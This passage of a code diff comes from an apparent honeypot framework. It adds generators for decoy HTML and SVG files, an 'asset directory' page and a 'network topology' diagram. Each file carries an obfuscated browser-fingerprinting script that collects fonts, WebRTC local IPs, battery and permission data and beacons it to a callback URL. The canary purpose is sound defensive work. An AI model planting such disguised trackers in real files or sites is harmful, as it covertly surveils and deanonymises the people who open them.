"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
"Malgun Gothic", "Noto Sans CJK",
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
"Bahnschrift", "Cyberpunk",
];
var sp = document.createElement("span");
sp.style.fontSize = "72px";
sp.style.position = "absolute";
sp.style.left = "-9999px";
sp.innerHTML = "mmmmmmmmmmlli";
document.body.appendChild(sp);
var bs = {};
for (var bi = 0; bi < bases.length; bi++) {
sp.style.fontFamily = bases[bi];
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
}
var det = [];
for (var ti = 0; ti < tests.length; ti++) {
for (var bj = 0; bj < bases.length; bj++) {
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
if (sp.offsetWidth !== bs[bases[bj]].w ||
sp.offsetHeight !== bs[bases[bj]].h) {
det.push(tests[ti]); break;
}
}
}
document.body.removeChild(sp);
// The hash is taken over a sorted copy; fp.ft.d keeps detection order.
fp.ft = {
h: await sha256(det.slice().sort().join(",")),
n: det.length, t: tests.length, d: det,
};
} catch (e) { fp.ft = { err: String(e) }; }
// webrtc local ip leak
// Collects ICE candidates for a fixed 1.5 s window, then closes the
// connection; only the first three raw candidate strings are kept.
// NOTE(review): the IPv6 alternative in the regex below only matches
// addresses that contain "::"; other candidates are still counted in n.
try {
var ips = {}; var cands = [];
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
window.mozRTCPeerConnection;
if (RPC) {
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
pc.createDataChannel("");
pc.onicecandidate = function (e) {
if (!e.candidate) return;
cands.push(e.candidate.candidate);
var m = e.candidate.candidate.match(
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
if (m) ips[m[1]] = 1;
};
var off = await pc.createOffer();
await pc.setLocalDescription(off);
await new Promise(function (r) { setTimeout(r, 1500); });
pc.close();
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
} else { fp.rtc = { err: "unavailable" }; }
} catch (e) { fp.rtc = { err: String(e) }; }
// battery
try {
if (navigator.getBattery) {
var bat = await navigator.getBattery();
// Infinity is mapped to the string "inf" because JSON.stringify would
// otherwise serialise it as null.
fp.bt = {
c: bat.charging, l: bat.level,
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
};
} else { fp.bt = { err: "unavailable" }; }
} catch (e) { fp.bt = { err: String(e) }; }
// perf timing jitter
// 1000 timings of a fixed 1000-iteration sqrt loop; after sorting, the
// fixed indices below give median, 95th percentile, min and max.
try {
var samples = [];
for (var pi = 0; pi < 1000; pi++) {
var pa = performance.now();
var x = 0;
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
samples.push(performance.now() - pa);
}
samples.sort(function (a, b) { return a - b; });
fp.pf = {
med: samples[500].toFixed(4),
p95: samples[950].toFixed(4),
mn: samples[0].toFixed(4),
mx: samples[999].toFixed(4),
};
} catch (e) { fp.pf = { err: String(e) }; }
// permissions
// Each name is queried on its own so one rejected query is recorded as
// "unsupported" without aborting the rest.
try {
if (navigator.permissions) {
var names = ["geolocation", "notifications", "camera", "microphone",
"persistent-storage", "clipboard-read", "clipboard-write"];
var st = {};
for (var ni = 0; ni < names.length; ni++) {
try {
var r = await navigator.permissions.query({ name: names[ni] });
st[names[ni]] = r.state;
} catch (e) { st[names[ni]] = "unsupported"; }
}
fp.pm = st;
} else { fp.pm = { err: "unavailable" }; }
} catch (e) { fp.pm = { err: String(e) }; }
// composite identity hash — stable inputs only
// filter(Boolean) drops missing or falsy inputs, so the hashed string is
// shorter when a probe above failed.
try {
var stable = [
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
fp.scr && (fp.scr.w + "x" + fp.scr.h),
].filter(Boolean).join("|");
fp.id = await sha256(stable);
} catch (e) { fp.id = { err: String(e) }; }
// 2) ship the payload as base64url JSON on a GET query param.
// The current worker records the hit on /c/<slug>; step-4 worker
// will decode ?d= and persist the fingerprint blob.
try {
var json = JSON.stringify(fp);
// unescape(encodeURIComponent(...)) turns the JSON into a UTF-8 byte
// string so btoa accepts non-Latin-1 characters; the replaces convert
// standard base64 to the URL-safe alphabet and strip padding.
var b64 = btoa(unescape(encodeURIComponent(json)))
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
// chunk if URL would exceed safe limit (~6KB)
var MAX = 6000;
if (b64.length <= MAX) {
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
} else {
// Chunked form: s = random session id shared by all parts, i = part
// index, n = total parts, d = this part's slice of the base64url text.
// NOTE(review): String.prototype.substr is a legacy method;
// slice(ci * MAX, (ci + 1) * MAX) would be equivalent here.
var sid = (Math.random() * 1e9 | 0).toString(36);
var total = Math.ceil(b64.length / MAX);
for (var ci = 0; ci < total; ci++) {
var part = b64.substr(ci * MAX, MAX);
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
}
}
} catch (e) { /* swallow */ }
})();

View File

@@ -0,0 +1,140 @@
"""HTML fingerprint canary — plausible-looking page with an obfuscated
browser-fingerprinting payload inlined at the bottom of ``<body>``.
The visible content is a deliberately mundane "internal directory"
table — the kind of file a curious attacker pulls off a decky's
filesystem and opens locally to triage. When the file is opened in
*any* network-connected browser the obfuscated payload runs and beacons
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
timing jitter, permissions, composite identity hash).
Determinism: the mint UUID is derived from the callback token via
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
output, satisfying the generator contract in :mod:`decnet.canary.base`.
The obfuscator's seed and polymorphic config bits are likewise
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
"""
from __future__ import annotations
import hashlib
import uuid
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
def _mint_uuid_for(callback_token: str) -> str:
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
def _stable_int(callback_token: str, salt: str = "") -> int:
"""Deterministic non-negative int derived from the callback token.
``builtins.hash`` is salted per-process — useless for a generator
that must be byte-identical across runs. SHA-256 prefix is
overkill but free.
"""
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
return int.from_bytes(h[:4], "big")
# HTML skeleton of the decoy "Internal Asset Directory" page.  It is
# rendered with ``str.format``, so literal CSS braces are doubled
# (``{{`` / ``}}``).  Placeholders: ``sync_label``, ``row_count``,
# ``rows`` (pre-rendered ``<tr>`` markup) and ``payload`` (the JS that
# is inlined in the trailing ``<script>`` element).
_PAGE_TEMPLATE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Internal Asset Directory</title>
<style>
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
margin:24px;font-size:13px}}
h1{{font-size:18px;margin:0 0 4px 0}}
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
table{{border-collapse:collapse;width:100%;background:#fff;
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
th{{background:#f4f4f4;font-weight:600;font-size:11px;
text-transform:uppercase;letter-spacing:.5px;color:#555}}
tr:hover td{{background:#fafbff}}
.foot{{margin-top:16px;color:#999;font-size:11px}}
</style>
</head>
<body>
<h1>Internal Asset Directory</h1>
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
<table>
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
{rows}
</table>
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
<script>{payload}</script>
</body>
</html>
"""
# Pool of fake directory entries the page table is drawn from.  Each
# entry is a 5-tuple in table-column order:
# (hostname, owner, role, vlan, notes).
_ROW_POOL = (
    ("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
    ("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
    ("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
    ("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
    ("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
    ("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
    ("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
    ("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
    ("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
)
def _build_rows(callback_token: str) -> tuple[str, int]:
    """Render the ``<tr>`` markup for one mint's directory table.

    A wrapping window of 5 to 8 consecutive ``_ROW_POOL`` entries is
    selected; both the start offset and the window length are derived
    from *callback_token* via ``_stable_int``, so the same token always
    yields the same rows.

    Returns:
        ``(rows_html, row_count)`` — newline-joined ``<tr>`` elements and
        the number of rows rendered.
    """
    # Function-scope import keeps this block self-contained.
    import html

    pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
    take = 5 + (_stable_int(callback_token, "take") % 4)
    selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]

    def render_row(row: tuple[str, ...]) -> str:
        # Cell text is escaped so values such as "lag <1s" cannot emit a
        # raw "<" into the markup; quotes are harmless in element content.
        cells = "".join(f"<td>{html.escape(c, quote=False)}</td>" for c in row)
        return f"<tr>{cells}</tr>"

    return "\n".join(render_row(row) for row in selected), len(selected)
def _sync_label(callback_token: str) -> str:
    """Build the fake "last sync" timestamp shown under the page title.

    The day of month (1-28) and the hour (0-23) are derived from
    *callback_token*; year, month and minute are fixed text.
    """
    hour = _stable_int(callback_token, "hour") % 24
    day = 1 + _stable_int(callback_token, "day") % 28
    return f"2026-04-{day:02d} {hour:02d}:14 UTC"
class FingerprintHtmlGenerator(CanaryGenerator):
    """Generator for an HTML decoy page that fingerprints whoever opens it."""

    name = "fingerprint_html"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the HTML artifact for *ctx*.

        The mint UUID, nonce, obfuscated payload, table rows and sync
        label are all derived from ``ctx.callback_token`` (plus
        ``ctx.http_base`` for the beacon URL).  The artifact's ``path``
        is left empty here.
        """
        token = ctx.callback_token
        mint_uuid = _mint_uuid_for(token)
        nonce = nonce_for(token, mint_uuid)
        js = render_fingerprint_js(
            callback_token=token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        table_rows, n_rows = _build_rows(token)
        page = _PAGE_TEMPLATE.format(
            sync_label=_sync_label(token),
            row_count=n_rows,
            rows=table_rows,
            payload=js,
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        notes = [
            f"obfuscated fingerprinter beacons={beacon}",
            f"mint_uuid={mint_uuid}",
        ]
        return CanaryArtifact(
            path="",
            content=page.encode("utf-8"),
            mode=0o644,
            # Backdate the file by 14 days relative to plant time.
            mtime_offset=-86400 * 14,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=notes,
        )

View File

@@ -0,0 +1,88 @@
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
that runs the obfuscated fingerprinter when the file is opened directly
in a browser.
SVG ``<script>`` only fires when the SVG is loaded as a top-level
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
SVG is referenced from another page's ``<img>``. That's the right
posture for canary use: an attacker browsing the decky filesystem and
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
inside a sandboxed CMS preview does not.
Same determinism guarantees as :mod:`fingerprint_html`.
"""
from __future__ import annotations
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
# Standalone SVG "network topology" decoy.  Rendered with ``str.format``,
# so literal CSS braces are doubled (``{{`` / ``}}``).  Placeholders:
# ``region``, ``ver``, ``review`` and ``payload`` (the JS placed inside
# the CDATA-wrapped ``<script>`` element).
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
<style>
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
</style>
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
<path class="edge" d="M160 105 L240 105"/>
<path class="edge" d="M360 105 L440 105"/>
<path class="edge" d="M300 130 L300 220"/>
<script type="application/ecmascript"><![CDATA[
{payload}
]]></script>
</svg>
"""
# Region labels the diagram title is drawn from (token-derived index).
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")


class FingerprintSvgGenerator(CanaryGenerator):
    """Synthesise an SVG that fingerprints the browser opening it."""

    name = "fingerprint_svg"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the SVG artifact for *ctx*.

        The mint UUID, nonce, obfuscated payload and the cosmetic title
        fields (region, draft version, review date) are all derived from
        ``ctx.callback_token``.  The artifact's ``path`` is left empty
        here.
        """
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        # The template wraps the script in a CDATA section.  Compact JS can
        # legitimately contain "]]>" (e.g. ``a[b[c]]>d``), which would end
        # the section early and leave an ill-formed document.  Splitting
        # the sequence across two adjacent CDATA sections keeps the XML
        # well-formed while the script text seen by the engine is unchanged.
        payload = payload.replace("]]>", "]]]]><![CDATA[>")
        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
        day = _stable_int(ctx.callback_token, "day") % 28 + 1
        body = _DIAGRAM_TEMPLATE.format(
            region=region,
            ver=ver,
            review=f"2026-03-{day:02d}",
            payload=payload,
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            # Backdate the file by 30 days relative to plant time.
            mtime_offset=-86400 * 30,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )

177
decnet/canary/obfuscator.py Normal file
View File

@@ -0,0 +1,177 @@
"""Per-mint JS obfuscator wrapper.
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
Used by the fingerprint generators / instrumenters to produce a unique,
hard-to-statically-analyse JS blob per canary mint.
Two design choices flow from the canary contract in :mod:`base`:
* **Determinism.** Generators must return byte-identical artifacts for
the same ``(callback_token, http_base, dns_zone, persona)``. We
derive a numeric seed from the callback token and pass it to the
obfuscator's own ``seed`` option, and we derive the polymorphic
config bits from the same hash so a re-mint reproduces exactly.
* **Per-mint uniqueness.** Two different callback tokens produce
structurally different output: different identifier names, different
string-array rotation, optionally different transforms enabled.
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
We pass code+options as JSON on stdin and read the obfuscated result
from stdout. Stderr surfaces obfuscator failures.
"""
from __future__ import annotations
import hashlib
import hmac
import json
import os
import subprocess # nosec B404 — Node helper exec is the whole point
from pathlib import Path
from typing import Any
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
# specific runtime; default to PATH lookup.
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
# Hard timeout for the obfuscator subprocess. Real runs on the
# fingerprint payload sit well under 5s on a dev box.
_TIMEOUT_S = 30
class ObfuscatorError(RuntimeError):
    """Raised when the Node helper fails or returns empty output.

    Covers a missing ``node`` binary, a subprocess timeout, a non-zero
    exit status, and blank stdout.
    """
class FingerprintSecretMissing(RuntimeError):
    """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset or empty.

    Fingerprint canaries embed a per-mint nonce derived from this
    server-side secret; without it the worker cannot validate incoming
    fingerprint beacons, so we fail loud at mint time rather than ship
    a defeatable canary.
    """
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET"  # nosec B105 — this is an env var name, not a hardcoded password


def nonce_for(callback_token: str, mint_uuid: str) -> str:
    """Return the per-mint fingerprint nonce for a token / mint pair.

    The nonce is the first 16 hex characters (64 bits) of an HMAC-SHA256
    keyed with the server-side master secret over
    ``callback_token + "|" + mint_uuid``.

    Raises:
        FingerprintSecretMissing: the secret environment variable is
            unset or empty.
    """
    secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
    if secret:
        key = secret.encode("utf-8")
        message = "|".join((callback_token, mint_uuid)).encode("utf-8")
        digest = hmac.new(key, message, hashlib.sha256).hexdigest()
        return digest[:16]
    raise FingerprintSecretMissing(
        f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
    )
def _seed_from_token(callback_token: str) -> int:
"""Derive a 31-bit numeric seed from the callback token.
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
using a SHA-256-derived prefix gives us a uniform distribution
across the 31-bit positive range.
"""
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
def _config_from_seed(seed: int) -> dict[str, Any]:
"""Build a deterministic, per-mint obfuscator config.
The hash bits drive *which* transforms apply — two mints get
structurally different outputs, not just different identifier names.
Defaults stay aggressive enough that reverse engineering is real
work; we never disable string-array or rename, only vary the dial.
"""
bits = seed
encodings = ("base64", "rc4")
string_array_encoding = [encodings[bits & 1]]
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
transform_object_keys = bool((bits >> 17) & 1)
numbers_to_expressions = bool((bits >> 18) & 1)
simplify = bool((bits >> 19) & 1)
return {
"compact": True,
"seed": seed,
"controlFlowFlattening": True,
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
"deadCodeInjection": True,
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
"stringArray": True,
"stringArrayEncoding": string_array_encoding,
"stringArrayThreshold": 1,
"stringArrayRotate": True,
"stringArrayShuffle": True,
"splitStrings": True,
"splitStringsChunkLength": 4 + (bits & 7),
"transformObjectKeys": transform_object_keys,
"numbersToExpressions": numbers_to_expressions,
"simplify": simplify,
"selfDefending": False, # breaks SVG embed; not worth the cost
"renameGlobals": False,
"identifierNamesGenerator": "mangled-shuffled",
}
def obfuscate(code: str, *, callback_token: str) -> str:
    """Run *code* through the Node obfuscator, seeded by *callback_token*.

    The seed and option set are both derived from the token, and the
    request is handed to the helper script as JSON on stdin.

    Returns:
        The helper's stdout, unmodified.

    Raises:
        ObfuscatorError: the node binary is missing, the helper times
            out, exits non-zero, or prints nothing but whitespace.
    """
    options = _config_from_seed(_seed_from_token(callback_token))
    request = json.dumps({"code": code, "options": options})
    argv = [_NODE_BIN, str(_HELPER)]
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
            argv,
            input=request,
            capture_output=True,
            text=True,
            timeout=_TIMEOUT_S,
            check=False,
        )
    except FileNotFoundError as e:
        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
    except subprocess.TimeoutExpired as e:
        raise ObfuscatorError("javascript-obfuscator timed out") from e

    if proc.returncode != 0:
        # Only the head of stderr is carried into the message.
        raise ObfuscatorError(
            f"javascript-obfuscator failed rc={proc.returncode} "
            f"stderr={proc.stderr.strip()[:400]}"
        )
    if not proc.stdout.strip():
        raise ObfuscatorError("javascript-obfuscator returned empty output")
    return proc.stdout
def render_fingerprint_js(
    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
    """Produce the obfuscated fingerprint script for one mint.

    The payload template is read from disk, its ``{{BEACON_URL}}``,
    ``{{MINT_UUID}}`` and ``{{MINT_NONCE}}`` markers are filled in, and
    the result is passed to :func:`obfuscate` keyed on the callback
    token.

    The nonce is appended as ``&k=`` on every beacon URL the JS emits;
    the worker rejects fingerprint payloads whose ``?k=`` doesn't match
    the row's :attr:`CanaryToken.fingerprint_nonce`.
    """
    source = _PAYLOAD.read_text(encoding="utf-8")
    beacon_url = f"{http_base.rstrip('/')}/c/{callback_token}"
    substitutions = (
        ("{{BEACON_URL}}", beacon_url),
        ("{{MINT_UUID}}", mint_uuid),
        ("{{MINT_NONCE}}", nonce),
    )
    # Applied in sequence, in the order listed above.
    for marker, value in substitutions:
        source = source.replace(marker, value)
    return obfuscate(source, callback_token=callback_token)

View File

@@ -0,0 +1,10 @@
{
"name": "decnet-canary-obfuscator",
"version": "0.1.0",
"private": true,
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
"main": "_obfuscate_helper.js",
"dependencies": {
"javascript-obfuscator": "^5.4.2"
}
}

View File

@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
}
_WINDOWS_DEFAULTS: dict[str, str] = {
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
}

View File

@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
"""
from __future__ import annotations
import asyncio
import base64
import os
import shlex
import time
from datetime import datetime, timedelta, timezone
from secrets import token_urlsafe
from typing import Any, Iterable, Optional
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
from decnet.canary.base import CanaryArtifact, CanaryContext
from decnet.canary.factory import get_generator
from decnet.canary.paths import default_path_for
from decnet.decky_io import (
delete_file_from_container,
resolve_topology_container,
write_file_to_container,
)
from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository
log = get_logger("canary.planter")
_DOCKER = "docker"
_TIMEOUT = 8.0
# Container suffix — matches the orchestrator SSH driver's convention
# (``<decky_name>-ssh``). Canary placement always happens through the
# ssh container because every decky has one and it carries the most
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
def _dirname(path: str) -> str:
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]
async def _run(
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
) -> tuple[int, str, str]:
try:
proc = await asyncio.create_subprocess_exec(
*argv,
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except FileNotFoundError as exc:
return 127, "", f"argv[0] not found: {exc}"
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
)
except asyncio.TimeoutError:
try:
proc.kill()
except ProcessLookupError:
pass
return 124, "", "timeout"
return (
proc.returncode if proc.returncode is not None else -1,
stdout.decode("utf-8", "replace"),
stderr.decode("utf-8", "replace"),
)
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
"""Compose the ``sh -c`` script + stdin payload for one artifact.
Binary safety: we base64-encode on the host and stream the result
over stdin to ``base64 -d`` inside the container, so the bytes
never touch the argv (kernel ARG_MAX would reject anything larger
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
and ``touch -d @<unix_ts>`` are present on every Linux base image
we ship, so there's no per-distro branching.
"""
encoded = base64.b64encode(artifact.content)
mtime = int(time.time() + artifact.mtime_offset)
mode_str = oct(artifact.mode)[2:]
parts = [
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
f"base64 -d > {shlex.quote(artifact.path)}",
f"chmod {mode_str} {shlex.quote(artifact.path)}",
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
]
return " && ".join(parts), encoded
# resolve_topology_container is re-exported from decky_io for back-compat
# with callers (tests, deploy hook) that imported it from this module
# before the decky_io extraction.
__all__ = [
"plant",
"revoke",
"resolve_topology_container",
"seed_baseline",
"seed_baseline_topology",
]
async def _publish(
@@ -139,6 +93,7 @@ async def plant(
repo: Optional[BaseRepository] = None,
publish: bool = True,
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]:
"""Write *artifact* into the decky's ssh container.
@@ -157,13 +112,12 @@ async def plant(
await repo.update_canary_token_state(token_uuid, "failed", err)
return False, err
sh_cmd, stdin_payload = _build_plant_command(artifact)
# ``-i`` keeps stdin attached so base64 -d inside the container can
# consume the encoded payload streamed from the host.
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
success = rc == 0
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
target_container = container or _container_for(decky_name)
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
success, error = await write_file_to_container(
target_container, artifact.path, artifact.content,
mode=artifact.mode, mtime=mtime,
)
if repo is not None:
if success:
@@ -182,8 +136,8 @@ async def plant(
if not success:
log.warning(
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
decky_name, token_uuid, rc, stderr[:120],
"canary.plant failed decky=%s token=%s container=%s err=%r",
decky_name, token_uuid, target_container, error,
)
return success, error
@@ -196,6 +150,7 @@ async def revoke(
repo: Optional[BaseRepository] = None,
publish: bool = True,
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]:
"""Best-effort unlink + state transition + bus publish.
@@ -203,11 +158,10 @@ async def revoke(
the file is gone after the call (whether we deleted it or it was
already missing); only docker / container-down errors return False.
"""
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv)
success = rc == 0
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
target_container = container or _container_for(decky_name)
success, error = await delete_file_from_container(
target_container, placement_path,
)
if repo is not None:
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -250,6 +204,7 @@ async def seed_baseline(
persona: str = "linux",
created_by: str = "system",
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> list[dict[str, Any]]:
"""Plant the configured baseline canary set on one decky.
@@ -293,9 +248,59 @@ async def seed_baseline(
await plant(
decky_name, artifact,
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
container=container,
)
out.append({
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
"callback_token": slug, "placement_path": artifact.path,
})
return out
async def seed_baseline_topology(
    repo: BaseRepository,
    topology_id: str,
    *,
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
    """Seed the baseline canary set on each decky of a MazeNET topology.

    Topology counterpart of :func:`seed_baseline`.  The target container
    for each decky comes from :func:`resolve_topology_container`, because
    a topology decky may have no ssh service; the base container is used
    in that case.

    Best-effort: per-decky plant failures are logged inside
    :func:`plant`, and the deploy hook treats the return value as
    informational.

    Returns:
        A flat list of the per-token dicts from :func:`seed_baseline`
        for all deckies, each extended with a ``decky_name`` key.  Empty
        when the topology cannot be hydrated.
    """
    from decnet.topology.persistence import hydrate

    topology = await hydrate(repo, topology_id)
    if topology is None:
        log.warning(
            "canary.seed_baseline_topology: topology %s not found", topology_id,
        )
        return []

    planted: list[dict[str, Any]] = []
    for decky in topology["deckies"]:
        # Prefer the name stored in the decky's config; fall back to the
        # decky record itself.  Nameless deckies are skipped.
        decky_name = (decky.get("decky_config") or {}).get("name") or decky.get("name")
        if decky_name:
            target = resolve_topology_container(
                topology_id, decky_name, decky.get("services") or [],
            )
            # MazeNET deckies don't carry an OS persona today; default to
            # linux (every base image we ship is Linux).
            rows = await seed_baseline(
